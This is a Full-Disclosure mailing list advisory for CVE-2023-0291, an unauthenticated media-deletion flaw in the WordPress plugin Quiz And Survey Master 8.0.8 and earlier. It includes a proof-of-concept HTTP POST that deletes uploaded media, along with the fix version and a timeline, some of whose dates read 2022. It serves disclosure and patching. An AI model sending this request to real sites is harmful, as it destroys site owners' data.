lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Wed, 8 Feb 2023 08:11:37 +0000
From: "Julien Ahrens (RCE Security)" <info@...security.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [CVE-2023-0291] Quiz And Survey Master <= 8.0.8 -
 Unauthenticated Arbitrary Media Deletion

RCE Security Advisory
https://www.rcesecurity.com


1. ADVISORY INFORMATION
=======================
Product:        Quiz And Survey Master
Vendor URL:     https://wordpress.org/plugins/quiz-master-next/
Type:           Missing Authentication for Critical Function [CWE-306]
Date found:     2023-01-13
Date published: 2023-02-08
CVSSv3 Score:   7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
CVE:            CVE-2023-0291


2. CREDITS
==========
This vulnerability was discovered and researched by Julien Ahrens from
RCE Security.


3. VERSIONS AFFECTED
====================
Quiz And Survey Master 8.0.8 and below


4. INTRODUCTION
===============
Quiz and Survey Master is the easiest WordPress Quiz Plugin which can be used
to create engaging content to drive traffic and increase user engagement.
Everything from viral quiz, trivia quiz, customer satisfaction surveys to employee
surveys. This plugin is the ultimate marketing tool for your website.

(from the vendor's homepage)


5. VULNERABILITY DETAILS
========================
The plugin offers the ajax action "qsm_remove_file_fd_question" to unauthenticated
users which accepts a "media_id" parameter pointing to a any item uploaded through
WordPress' media upload functionality. However, this "media_id" is afterward used
in a forced wp_delete_attachment() call ultimately deleteing the media from the
WordPress instance.

Successful exploits can allow an unauthenticated attacker to delete any (and all)
uploaded WordPress media files.


6. PROOF OF CONCEPT
===================
The following Proof-of-Concept would delete the uploaded media with the ID "1":

POST /wp-admin/admin-ajax.php HTTP/2
Host: localhost
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

action=qsm_remove_file_fd_question&media_id=1


7. SOLUTION
===========
Update to version 8.0.9


8. REPORT TIMELINE
==================
2023-01-13: Discovery of the vulnerability
2023-01-13: Wordfence (responsible CNA) assigns CVE-2023-0291
2023-01-18: Sent initial notification to vendor via contact form
2022-01-18: Vendor response
2022-01-21: Vendor releases version 8.0.9 which fixes the vulnerability
2022-02-08: Public disclosure


9. REFERENCES
=============
https://github.com/MrTuxracer/advisories


--
Mit freundlichen Grüßen / With best regards / Atentamente

Julien Ahrens
Freelancer | Penetration Tester

RCE Security
VAT-ID: DE328576638
Website: www.rcesecurity.com


This e-mail may contain confidential and/or privileged information.
If you are not the intended recipient (or have received this e-mail in
error) please notify the sender immediately and destroy this e-mail.
Any unauthorized copying, disclosure or distribution of the material
in this e-mail is strictly forbidden.


Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ